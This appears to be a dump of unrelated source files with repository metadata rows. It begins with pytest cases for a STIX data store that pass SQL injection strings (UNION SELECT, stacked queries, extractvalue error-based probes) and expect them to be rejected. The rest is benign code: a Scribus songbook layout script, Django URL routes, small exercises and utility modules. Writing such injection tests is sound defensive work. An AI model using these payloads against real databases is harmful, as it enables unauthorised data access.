store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(InvalidViewname):
store.filter('junk', 'url', 'urls OR 1', "[url:value = 'http://www26.example.com/page/176']")
def test_sqli_1(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(InvalidViewname):
store.lookup('urls" UNION ALL SELECT * FROM "q1_url')
def test_sqli_2(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(InvalidAttr):
store.values('url:fake.path', 'urls')
with pytest.raises(InvalidStixPath):
store.values('value" FROM "q1_ipv4-addr" UNION ALL SELECT "value', 'urls')
def test_sqli_3(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
res = store.load('test_urls', [
{
'type': 'url',
'value': 'http://www26.example.com/page/176',
'risk': 'high',
},
{
'type': 'url',
'value': 'http://www67.example.com/page/264',
'risk': 'high',
}
])
with pytest.raises(InvalidViewname):
store.join('sqli" AS SELECT * FROM "q1_url"; CREATE VIEW "marked',
'urls', 'value', 'test_urls', 'value')
def test_empty_results(fake_bundle_file, tmpdir):
"""Look for finding objects that aren't there"""
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('my_findings', 'x-ibm-finding', 'q1', "[x-ibm-finding:name = 'Whatever']")
findings = store.lookup('my_findings')
assert findings == []
def test_lookup_bad_columns(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(InvalidAttr):
store.lookup('urls', cols="1; select * from urls; --")
def test_lookup_bad_offset(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(TypeError):
store.lookup('urls', offset="1; select * from urls; --")
def test_bad_groupby(fake_bundle_file, fake_csv_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('users', 'user-account', 'q1', "[ipv4-addr:value LIKE '10.%']")
with pytest.raises(InvalidStixPath):
store.assign('grouped_users', 'users', op='group',
by='1,extractvalue(0x0a,concat(0x0a,(select database())))--')
def test_assign_bad_columns(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(InvalidStixPath):
store.assign('sorted', 'urls', op='sort',
by='value LIMIT 1; SELECT * FROM "urls"')
def test_sort_bad_limit(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(TypeError):
store.assign('sorted', 'urls', op='sort', by='value', limit='1; SELECT 1; --')
def test_merge_fail(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('test-bundle', [fake_bundle_file])
store.extract('urls', 'url', 'test-bundle', "[url:value LIKE '%page/1%']")
store.extract('ips', 'ipv4-addr', 'test-bundle', "[ipv4-addr:value != '8.8.8.8']")
with pytest.raises(IncompatibleType):
store.merge('merged', ['urls', 'ips'])
| 35.587838 | 101 | 0.652933 | 0 | 0 | 0 | 0 | 150 | 0.028479 | 0 | 0 | 1,565 | 0.297133 |
731f66af557f8e0f3fe1a093bf5c18d9478212d8 | 11,798 | py | Python | script/run_scribus.py | csneofreak/public-domain-season-songs | d6e559e7cfe6e3a7ab784855a096d02ae8c656cd | [
"Unlicense"
]
| 14 | 2015-12-18T10:52:15.000Z | 2021-01-11T14:43:47.000Z | script/run_scribus.py | csneofreak/public-domain-season-songs | d6e559e7cfe6e3a7ab784855a096d02ae8c656cd | [
"Unlicense"
]
| 1 | 2015-12-05T19:30:01.000Z | 2015-12-05T19:30:01.000Z | script/run_scribus.py | csneofreak/public-domain-season-songs | d6e559e7cfe6e3a7ab784855a096d02ae8c656cd | [
"Unlicense"
]
| 9 | 2015-03-11T04:09:23.000Z | 2021-12-18T21:44:47.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import json
import os
import math
import scribus
import simplebin
import inspect
from collections import defaultdict
PWD = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
def pwd(path):
return os.path.join(PWD, path);
DATA_FILE = pwd("data.json")
CACHE_FILE = pwd("cache.json")
MANUEL_PROCESSING_FILE = pwd("manual_processing.json")
FILES = pwd("lily_output/")
FAST = False # use this to debug
SPACING_SONGS = 10
EFFECTIVE_PAGE_HEIGHT = 255 + SPACING_SONGS
SPACING_HEADLINE_SONG = 18
SPACING_SONG_TEXT = 5
PAGE_NUM_HEIGHT = 5
BASELINE_GRID = 5
def init():
scribus.openDoc(pwd("init.sla"))
scribus.saveDocAs("/tmp/{}.sla".format(time.time()))
scribus.setUnit(scribus.UNIT_MM)
def front_matter():
# load pages from other document
if not os.path.exists(pwd("front_matter.sla")):
print "not front matter, file not found!"
return
scribus.openDoc(pwd("front_matter.sla"))
pages = scribus.pageCount()
scribus.closeDoc()
scribus.importPage(
pwd("front_matter.sla"), # filename
tuple(range(1, pages+1)), # range of pages to import
1, # insert (1) or replace(0)
0, # where to insert
)
scribus.gotoPage(pages+1)
def fit_height(textbox):
# come to a state that the text box does not overflow:
width, height = scribus.getSize(textbox)
to_add = height + 1
while scribus.textOverflows(textbox):
scribus.sizeObject(width, height + to_add, textbox)
to_add = to_add * 2
# reduce height
step = height/2
overflows = False
counter = 0
while step > 0.05 or overflows:
counter += 1
width, old_height = scribus.getSize(textbox)
if scribus.textOverflows(textbox):
scribus.sizeObject(width, old_height + step, textbox)
else:
scribus.sizeObject(width, old_height - step, textbox)
step = step * 0.5
overflows = scribus.textOverflows(textbox)
def new_page():
scribus.newPage(-1)
scribus.gotoPage(scribus.pageCount())
add_page_number()
def add_page_number():
page_num = scribus.pageCount()
page_width, page_height, margin_top, margin_left, margin_right, margin_bottom = page_size_margin(page_num)
textbox = scribus.createText(margin_left, page_height-margin_bottom, page_width-margin_left-margin_right, PAGE_NUM_HEIGHT)
scribus.setStyle("pagenumber_{}".format(get_style_suffix()), textbox)
scribus.insertText(str(page_num), 0, textbox)
scribus.deselectAll()
def page_size_margin(page_num):
size = scribus.getPageNSize(page_num)
margin = scribus.getPageNMargins(page_num)
return size + margin
def get_style_suffix():
page_num = scribus.pageCount()
style_suffix = "r" # is this really the right way? is there no shortcut provided by scribus?
if page_num % 2 == 0:
style_suffix = "l"
return style_suffix
def load_song(data, offset, settings):
page_num = scribus.pageCount()
page_width, page_height, margin_top, margin_left, margin_right, margin_bottom = page_size_margin(page_num)
start_point = margin_top + offset
new_width = page_width - margin_left - margin_right
if not FAST:
scribus.placeEPS(os.path.join(FILES, data["filename"]), 0, 0)
eps = scribus.getSelectedObject()
eps_width, eps_height = scribus.getSize(eps)
#scribus.scaleGroup(new_width/eps_width) # slow on scribus 1.4; does something else on scribus 1.5
scribus.sizeObject(eps_width*0.86, eps_height*0.86, eps)
scribus.moveObjectAbs(margin_left, start_point+SPACING_HEADLINE_SONG, eps)
eps_width, eps_height = scribus.getSize(eps)
else:
eps_height = 0
scribus.deselectAll()
textbox = scribus.createText(margin_left, start_point, new_width, 20)
style_suffix = get_style_suffix()
if data["composer"]:
scribus.deselectAll()
scribus.insertText(u"{}\n".format(data["composer"]), 0, textbox)
scribus.selectText(0, 1, textbox)
scribus.setStyle("subline_{}".format(style_suffix), textbox)
if data["poet"]:
scribus.deselectAll()
scribus.insertText(u"{}\n".format(data["poet"]), 0, textbox)
scribus.selectText(0, 1, textbox)
scribus.setStyle("subline_{}".format(style_suffix), textbox)
scribus.deselectAll()
scribus.insertText(u"{}\n".format(data["name"]), 0, textbox)
scribus.selectText(0, 1, textbox)
scribus.setStyle("headline_{}".format(style_suffix), textbox)
text = data["text"]
text = [t.strip() for t in text if t.strip() != ""]
# TODO: exit if text == []
textbox = scribus.createText(margin_left, start_point + eps_height + SPACING_HEADLINE_SONG + SPACING_SONG_TEXT, new_width, 50)
scribus.setStyle("text", textbox)
# let's see how many digits are in there:
num_verses = len([l for l in text if l.isdigit()])
num_chars = 0
num_line_total = len(text)
num_line_actually = 0
no_new_line = False
verse_counter = 0
text_columns_height = 0 # TODO: should be None
for num_line, line in enumerate(text):
if line.strip == "":
continue
num_line_actually += 1
if line.isdigit():
print "#", verse_counter, math.ceil(num_verses * 0.5), num_verses, data["filename"]
if verse_counter == math.ceil(num_verses*0.5): # this is the first verse that should be in the new column, so let's see what's the height
print text_columns_height, num_line_actually
text_columns_height = BASELINE_GRID * (num_line_actually -1)
first_char = "\n"
if num_line == 0:
first_char = ""
no_new_line = True
line = u"{}{}.\t".format(first_char, line)
scribus.insertText(line, -1, textbox)
scribus.deselectAll()
scribus.selectText(num_chars, len(line), textbox)
#scribus.setStyle("num", textbox) # no character styles available
#scribus.setFontSize(5, textbox) # TODO: testing only # BUG?
scribus.setFont("Linux Libertine O Bold", textbox)
num_chars += len(line)
verse_counter += 1
else:
if no_new_line:
first_char = ""
else:
first_char = chr(28)
no_new_line = False
line = u"{}{}".format(first_char, line)
scribus.insertText(line, -1, textbox)
#scribus.deselectAll()
#scribus.selectText(num_chars, len(line), textbox)
#scribus.setStyle("text", textbox)
num_chars += len(line)
scribus.setColumnGap(5, textbox)
columns = settings.get("columns", 2)
scribus.setColumns(columns, textbox)
if columns != 2:
fit_height(textbox)
else:
scribus.sizeObject(new_width, text_columns_height, textbox)
l, t = scribus.getPosition(textbox)
scribus.moveObjectAbs(l, round(t/BASELINE_GRID)*BASELINE_GRID, textbox)
if scribus.textOverflows(textbox):
fit_height(textbox) # there are some cases,..
text_width, text_height = scribus.getSize(textbox)
text_left, text_top = scribus.getPosition(textbox)
return text_top + text_height - start_point + SPACING_SONGS, page_num
def create_toc(data):
if not scribus.objectExists("TOC"):
new_page()
page_width, page_height, margin_top, margin_left, margin_right, margin_bottom = page_size_margin(1)
toc = scribus.createText(margin_left, margin_top, page_width-margin_right-margin_left, page_height-margin_top-margin_bottom)
scribus.setNewName("TOC", toc)
scribus.insertText("provide a textframe with name 'TOC' in front_matter.sla and i will not create the toc at the end of the document", 0, "TOC")
text = "\n".join(("{}\t{}".format(title, pagenum) for (title, pagenum) in data))
scribus.insertText(text, -1, "TOC")
def add_songs(all_songs, songs_double_page, manual_processing, songs_data, cache):
# let's get the best sorting
songs_combined = simplebin.best_fit(all_songs, EFFECTIVE_PAGE_HEIGHT)
# sorting the songs alphabetic
songs_sorted = sorted(songs_combined, key=lambda x: x[0])
# make sure the double page will be added on the left side
page_num = scribus.pageCount()
for double_page in songs_double_page:
if not double_page in all_songs:
continue
offset = songs_sorted.index([double_page])
songs_sorted.insert(offset+1, None) # add a empty page after the song
if (page_num + offset) % 2 != 0: # song is on right side, empty side on the left side.
songs_sorted.insert(offset, songs_sorted.pop(offset+2)) # move next song before the double page
# TODO: what if double sided song is last song?
for songs in songs_sorted:
current_pos = 0
if songs == None: # we added this for a song that should be set on double page
new_page()
continue
for filename in songs:
if not manual_processing[filename].get("show", True):
continue
data = songs_data[filename]
height, page_num = load_song(data, current_pos, manual_processing[filename])
current_pos += math.ceil(height/BASELINE_GRID) * BASELINE_GRID
cache[filename]["height"] = round(height, 2)
cache[filename]["page"] = page_num
scribus.progressSet(1)
if current_pos != 0:
new_page()
def main():
cache = defaultdict(dict)
try:
with open(CACHE_FILE, "rb") as cache_file:
cache = defaultdict(dict, json.load(cache_file))
except:
pass
with open(DATA_FILE, "rb") as data_file:
songs_data = json.load(data_file)
with open(MANUEL_PROCESSING_FILE, "rb") as manual_file:
manual_processing = defaultdict(dict, json.load(manual_file))
scribus.statusMessage("Running script...")
scribus.progressReset()
scribus.progressTotal(len(songs_data))
init()
front_matter()
add_page_number()
# trying to get the best sorting
# setting all songs to the max height
all_songs = dict(zip(songs_data.keys(), [EFFECTIVE_PAGE_HEIGHT] * len(songs_data)))
# update according to cache
for song_name, data in cache.iteritems():
all_songs[song_name] = min(data.get("height", EFFECTIVE_PAGE_HEIGHT), EFFECTIVE_PAGE_HEIGHT)
# let's see which songs should be set on a double sided page:
songs_double_page = filter(lambda x: manual_processing[x].get("double_page", False), manual_processing)
for double_page in songs_double_page:
all_songs[double_page] = EFFECTIVE_PAGE_HEIGHT # all double page songs should get a whole page despite their height
appendix_filter = lambda a_s, boolean : {k:v for k,v in a_s.iteritems() if manual_processing[k].get("appendix", False) == boolean}
main_songs = appendix_filter(all_songs, False)
add_songs(main_songs, songs_double_page, manual_processing, songs_data, cache)
appendix_songs = appendix_filter(all_songs, True)
add_songs(appendix_songs, songs_double_page, manual_processing, songs_data, cache)
toc = []
for filename in filter(lambda s: manual_processing[s].get("show", True), all_songs.keys()):
toc.append((songs_data[filename]["name"], cache[filename].get("page", "XX")))
toc.sort(key=lambda (x,y): x)
create_toc(toc)
if scribus.haveDoc():
scribus.setRedraw(True)
scribus.statusMessage("")
scribus.progressReset()
with open(CACHE_FILE, "wb") as cache_file:
json.dump(cache, cache_file, indent=2)
if __name__ == "__main__":
main()
| 37.693291 | 152 | 0.66418 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,073 | 0.175708 |
73204039a36f632a872aa19aeb8f09ee3f95315d | 424 | py | Python | 12-transformar_metro.py | tainagirotto/exercicios-py | 39107c05a0a8e5230cd48876ad8e1ad6f0a2ff59 | [
"MIT"
]
| null | null | null | 12-transformar_metro.py | tainagirotto/exercicios-py | 39107c05a0a8e5230cd48876ad8e1ad6f0a2ff59 | [
"MIT"
]
| null | null | null | 12-transformar_metro.py | tainagirotto/exercicios-py | 39107c05a0a8e5230cd48876ad8e1ad6f0a2ff59 | [
"MIT"
]
| null | null | null | # Ler um número em metros e mostrar seu valor em cm e mm:
m = float(input('Digite o valor em metros: '))
dm = m * 10
cm = m * 100
mm = m * 1000
km = m/1000
hm = m/100
dam = m/10
print('O valor em cm é {}' .format(cm))
print('O valor em milímetros é {}' .format(mm))
print('O valor em dm é {}' .format(dm))
print('O valor em km é {}' .format(km))
print('O valor em hm {}' .format(hm))
print('O valor em dm {}' .format(dm))
| 24.941176 | 57 | 0.613208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 215 | 0.5 |
73212f2cfd8e6dccfeaf70d354cab83a3bcc2ae2 | 3,059 | py | Python | src/urls.py | chunky2808/Hire-Me | 7a43fb2f555a5f46e285d24c18457c2ce1c0d225 | [
"MIT"
]
| null | null | null | src/urls.py | chunky2808/Hire-Me | 7a43fb2f555a5f46e285d24c18457c2ce1c0d225 | [
"MIT"
]
| 6 | 2020-02-12T00:41:15.000Z | 2022-03-11T23:20:37.000Z | src/urls.py | chunky2808/Hire-Me | 7a43fb2f555a5f46e285d24c18457c2ce1c0d225 | [
"MIT"
]
| null | null | null | """src URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from accounts import views as accounts_views
from hire import views as hire_views
from django.contrib.auth import views as auth_views
from chat_app import views as chat_views
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', hire_views.mainee,name = 'maiee'),
url(r'^accounts/', include('django.contrib.auth.urls')),
url(r'^accounts/signup/$', accounts_views.signup, name='signup'),
url(r'^accounts/signup/customer/$', accounts_views.CustomerSignUpView.as_view(), name='customer_signup'),
url(r'^accounts/signup/service/$', accounts_views.ServiceSignUpView.as_view(), name='service_signup'),
url(r'^chat/(?P<stri_id>\w+?)/', chat_views.chat, name='index'),
url(r'^chatbox/(?P<stri_id>\w+?)/', chat_views.chatbox, name='chat'),
url(r'^oauth/', include('social_django.urls', namespace='social')), # <--
url(r'^login/$', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
url(r'^logout/$', auth_views.LogoutView.as_view(), name='logout'),
url(r'^services/$', hire_views.home, name='home'),
url(r'^services/new/$', hire_views.add_service, name='new_service'),
url(r'^services/(?P<pk>\d+)/$', hire_views.list_services, name='serve_list'),
url(r'^services/(?P<pk>\d+)/new/$', hire_views.list_services_new, name='new_serve_list'),
url(r'^services/(?P<pk>\d+)/delete/$', hire_views.delete_main, name='delete'),
url(r'^services/(?P<pk>\d+)/(?P<Service_category_pk>\d+)/review/$', hire_views.review, name='review'),
url(r'^services/(?P<pk>\d+)/(?P<Service_category_pk>\d+)/review/new/$', hire_views.review_new, name='review_new'),
url(r'^worker_page/(?P<pk>\d+)/$', hire_views.worker_page, name='worker_page'),
url(r'^increment/(?P<pk>\d+)/(?P<Service_category_pk>\d+)/review/$', hire_views.increment, name='increment'),
url(r'^decrement/(?P<pk>\d+)/(?P<Service_category_pk>\d+)/review/$', hire_views.decrement, name='decrement'),
# url(r'^user/$', hire_views.model_form_upload, name='model_form_upload'),
url(r'^hello/$', hire_views.hello, name='hello'),
]
if settings.DEBUG == True:
urlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)
| 50.147541 | 119 | 0.676038 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,603 | 0.524027 |
7322d738208c1e92a29dc1677393b7f139a60b9b | 1,546 | py | Python | re_compare/re_compare.py | gchase/re-compare | c717094053fd5938ea7f0a46dcfec75bc077cb7e | [
"MIT"
]
| null | null | null | re_compare/re_compare.py | gchase/re-compare | c717094053fd5938ea7f0a46dcfec75bc077cb7e | [
"MIT"
]
| null | null | null | re_compare/re_compare.py | gchase/re-compare | c717094053fd5938ea7f0a46dcfec75bc077cb7e | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
import logging
import argparse
import traceback
import os
import sys
from analysis import Analysis
from collector import Collector
from config import DEBUG, DEFAULT_LOG_FILE_DIR
def is_dir(dirname):
if not os.path.isdir(dirname):
msg = "{0} is not a directory".format(dirname)
raise argparse.ArgumentTypeError(msg)
else:
return dirname
def main():
if DEBUG:
logging.basicConfig(
stream=sys.stdout,
level=logging.INFO,
format=
'[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',
datefmt="%H:%M:%S")
parser = argparse.ArgumentParser()
parser.add_argument('--task', type=lambda x: is_dir(x))
parser.add_argument(
'--test_types',
nargs="+",
choices=['first_match', 'all_matches', 'consecutive_matches'])
parser.add_argument('--log_files', nargs='+', type=argparse.FileType())
parser.set_defaults(
test_types=['first_match', 'all_matches', 'consecutive_matches'])
args = parser.parse_args()
if args.log_files:
logging.info('starting analysis')
Analysis(files=args.log_files).analyze_logs()
logging.info('finished analysis')
else:
logging.info('starting collection')
Collector(args.task).collect()
logging.info('finished collection')
logging.info('starting analysis')
Analysis(logs_dir=DEFAULT_LOG_FILE_DIR).analyze_logs()
if __name__ == '__main__':
main()
| 24.539683 | 82 | 0.641656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 369 | 0.23868 |
7323e7284674358cab716226cc5bccd1b52ec055 | 1,216 | py | Python | venv/Lib/site-packages/nipype/conftest.py | richung99/digitizePlots | 6b408c820660a415a289726e3223e8f558d3e18b | [
"MIT"
]
| 585 | 2015-01-12T16:06:47.000Z | 2022-03-26T14:51:08.000Z | nipype/conftest.py | tamires-consulting/nipype | b7879d75a63b6500b2e7d2c3eba5aa7670339274 | [
"Apache-2.0"
]
| 2,329 | 2015-01-01T09:56:41.000Z | 2022-03-30T14:24:49.000Z | nipype/conftest.py | tamires-consulting/nipype | b7879d75a63b6500b2e7d2c3eba5aa7670339274 | [
"Apache-2.0"
]
| 487 | 2015-01-20T01:04:52.000Z | 2022-03-21T21:22:47.000Z | import os
import shutil
from tempfile import mkdtemp
import pytest
import numpy
import py.path as pp
NIPYPE_DATADIR = os.path.realpath(
os.path.join(os.path.dirname(__file__), "testing/data")
)
temp_folder = mkdtemp()
data_dir = os.path.join(temp_folder, "data")
shutil.copytree(NIPYPE_DATADIR, data_dir)
@pytest.fixture(autouse=True)
def add_np(doctest_namespace):
doctest_namespace["np"] = numpy
doctest_namespace["os"] = os
doctest_namespace["pytest"] = pytest
doctest_namespace["datadir"] = data_dir
@pytest.fixture(autouse=True)
def _docdir(request):
"""Grabbed from https://stackoverflow.com/a/46991331"""
# Trigger ONLY for the doctests.
doctest_plugin = request.config.pluginmanager.getplugin("doctest")
if isinstance(request.node, doctest_plugin.DoctestItem):
# Get the fixture dynamically by its name.
tmpdir = pp.local(data_dir)
# Chdir only for the duration of the test.
with tmpdir.as_cwd():
yield
else:
# For normal tests, we have to yield, since this is a yield-fixture.
yield
def pytest_unconfigure(config):
# Delete temp folder after session is finished
shutil.rmtree(temp_folder)
| 26.434783 | 76 | 0.709704 | 0 | 0 | 540 | 0.444079 | 784 | 0.644737 | 0 | 0 | 339 | 0.278783 |
732764ebd0702a98bf1fa40e238672b9d8162849 | 397 | py | Python | tests/test_modules/test_ADPandABlocks/test_adpandablocks_blocks.py | aaron-parsons/pymalcolm | 4e7ebd6b09382ab7e013278a81097d17873fa5c4 | [
"Apache-2.0"
]
| null | null | null | tests/test_modules/test_ADPandABlocks/test_adpandablocks_blocks.py | aaron-parsons/pymalcolm | 4e7ebd6b09382ab7e013278a81097d17873fa5c4 | [
"Apache-2.0"
]
| null | null | null | tests/test_modules/test_ADPandABlocks/test_adpandablocks_blocks.py | aaron-parsons/pymalcolm | 4e7ebd6b09382ab7e013278a81097d17873fa5c4 | [
"Apache-2.0"
]
| null | null | null | from mock import Mock
from malcolm.testutil import ChildTestCase
from malcolm.modules.ADPandABlocks.blocks import pandablocks_runnable_block
class TestADPandABlocksBlocks(ChildTestCase):
def test_pandablocks_runnable_block(self):
self.create_child_block(
pandablocks_runnable_block, Mock(),
mri_prefix="mri_prefix", pv_prefix="pv_prefix", config_dir="/tmp")
| 33.083333 | 78 | 0.7733 | 252 | 0.634761 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.073048 |
73276ed229a6cddfa545672ed9e4e28191eeb79e | 2,939 | py | Python | pymbolic/mapper/coefficient.py | sv2518/pymbolic | 42687a410b1c355beec510b91c18f97e5137795b | [
"MIT"
]
| null | null | null | pymbolic/mapper/coefficient.py | sv2518/pymbolic | 42687a410b1c355beec510b91c18f97e5137795b | [
"MIT"
]
| null | null | null | pymbolic/mapper/coefficient.py | sv2518/pymbolic | 42687a410b1c355beec510b91c18f97e5137795b | [
"MIT"
]
| null | null | null | __copyright__ = "Copyright (C) 2013 Andreas Kloeckner"
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from pymbolic.mapper import Mapper
class CoefficientCollector(Mapper):
def __init__(self, target_names=None):
self.target_names = target_names
def map_sum(self, expr):
stride_dicts = [self.rec(ch) for ch in expr.children]
result = {}
for stride_dict in stride_dicts:
for var, stride in stride_dict.items():
if var in result:
result[var] += stride
else:
result[var] = stride
return result
def map_product(self, expr):
result = {}
children_coeffs = [self.rec(child) for child in expr.children]
idx_of_child_with_vars = None
for i, child_coeffs in enumerate(children_coeffs):
for k in child_coeffs:
if k != 1:
if (idx_of_child_with_vars is not None
and idx_of_child_with_vars != i):
raise RuntimeError(
"nonlinear expression")
idx_of_child_with_vars = i
other_coeffs = 1
for i, child_coeffs in enumerate(children_coeffs):
if i != idx_of_child_with_vars:
assert len(child_coeffs) == 1
other_coeffs *= child_coeffs[1]
if idx_of_child_with_vars is None:
return {1: other_coeffs}
else:
return {
var: other_coeffs*coeff
for var, coeff in
children_coeffs[idx_of_child_with_vars].items()}
return result
def map_constant(self, expr):
return {1: expr}
def map_algebraic_leaf(self, expr):
if self.target_names is None or expr.name in self.target_names:
return {expr: 1}
else:
return {1: expr}
| 35.841463 | 77 | 0.639673 | 1,799 | 0.612113 | 0 | 0 | 0 | 0 | 0 | 0 | 1,090 | 0.370874 |
7328644eaa6b2ec01fefc42231719421b2897b5b | 1,958 | py | Python | day_06/balancer.py | anglerud/advent_of_code_2017 | eff27d43cd9eb7c60271887c80cb88f1ae50c48d | [
"MIT"
]
| 3 | 2017-12-06T21:23:19.000Z | 2020-04-12T09:49:53.000Z | day_06/balancer.py | anglerud/advent_of_code_2017 | eff27d43cd9eb7c60271887c80cb88f1ae50c48d | [
"MIT"
]
| null | null | null | day_06/balancer.py | anglerud/advent_of_code_2017 | eff27d43cd9eb7c60271887c80cb88f1ae50c48d | [
"MIT"
]
| null | null | null | #!/usr/bin/env python
# coding: utf-8
""" """
import typing as t
import attr
import click
@attr.s(frozen=True)
class Memory(object):
banks: t.Tuple[int, ...] = attr.ib()
def balance(self) -> 'Memory':
mem = list(self.banks)
num_banks = len(self.banks)
# Find the amount of blocks to balance - remove them from that bank.
blocks_to_balance = max(mem)
bank_pointer = mem.index(blocks_to_balance)
mem[bank_pointer] = 0
# Rebalance
balance_rounds = 0
while blocks_to_balance > 0:
# Advance the pointer.
bank_pointer = (bank_pointer + 1) % num_banks
mem[bank_pointer] += 1
blocks_to_balance -= 1
return Memory(
banks=tuple(mem)
)
def detect_loop(memory: Memory) -> int:
"""Find how many steps until we detect a loop."""
arrangements_seen = set()
balancer_rounds = 0
while memory not in arrangements_seen:
arrangements_seen.add(memory)
memory = memory.balance()
balancer_rounds += 1
return balancer_rounds, memory
@click.group()
def balancer():
"""Balancing memory like they were spinning tops."""
pass
@balancer.command()
@click.argument('memory_banks', type=click.File())
def distribute(memory_banks):
banks = tuple(map(int, memory_banks.read().split()))
memory = Memory(banks)
steps, memory = detect_loop(memory)
msg = f"Loop found after {steps} balance rounds."
click.secho(msg, fg='green')
@balancer.command()
@click.argument('memory_banks', type=click.File())
def loop_size(memory_banks):
banks = tuple(map(int, memory_banks.read().split()))
memory = Memory(banks)
_, memory = detect_loop(memory)
loop_size, _ = detect_loop(memory)
msg = f"Loop size is {loop_size}."
click.secho(msg, fg='green')
def main():
"""Entrypoint."""
balancer()
if __name__ == '__main__':
main()
| 23.035294 | 76 | 0.62666 | 673 | 0.343718 | 0 | 0 | 1,433 | 0.731869 | 0 | 0 | 393 | 0.200715 |
7329f5fd535980ef38334fa719dd3596b7005058 | 176 | py | Python | python-while/exercise4.py | crobert7/Py-Basics | c1d1a1441de6cbee409c59ddda2b11bc7ee16df1 | [
"MIT"
]
| null | null | null | python-while/exercise4.py | crobert7/Py-Basics | c1d1a1441de6cbee409c59ddda2b11bc7ee16df1 | [
"MIT"
]
| null | null | null | python-while/exercise4.py | crobert7/Py-Basics | c1d1a1441de6cbee409c59ddda2b11bc7ee16df1 | [
"MIT"
]
| null | null | null | word = input('Type a word: ')
while word != 'chupacabra':
word = input('Type a word: ')
if word == 'chupacabra':
print('You are out of the loop')
break | 25.142857 | 40 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 79 | 0.448864 |
732ac32a2f056f0d1b4317192e07425ea49f8e2a | 1,268 | bzl | Python | pw_build/selects.bzl | mspang/pigweed | 89ff5f98f38b1ff7a1ff0633c590479e9b592a14 | [
"Apache-2.0"
]
| null | null | null | pw_build/selects.bzl | mspang/pigweed | 89ff5f98f38b1ff7a1ff0633c590479e9b592a14 | [
"Apache-2.0"
]
| 1 | 2021-06-18T13:54:41.000Z | 2021-06-18T13:54:41.000Z | pw_build/selects.bzl | mspang/pigweed | 89ff5f98f38b1ff7a1ff0633c590479e9b592a14 | [
"Apache-2.0"
]
| null | null | null | # Copyright 2021 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
_RTOS_NONE = "//pw_build/constraints/rtos:none"
# Common select for tagging a target as only compatible with host OS's. This
# select implements the logic '(Windows or Macos or Linux) and not RTOS'.
# Example usage:
# load("//pw_build:selects.bzl","TARGET_COMPATIBLE_WITH_HOST_SELECT")
# pw_cc_library(
# name = "some_host_only_lib",
# hdrs = ["host.h"],
# target_compatible_with = select(TARGET_COMPATIBLE_WITH_HOST_SELECT),
# )
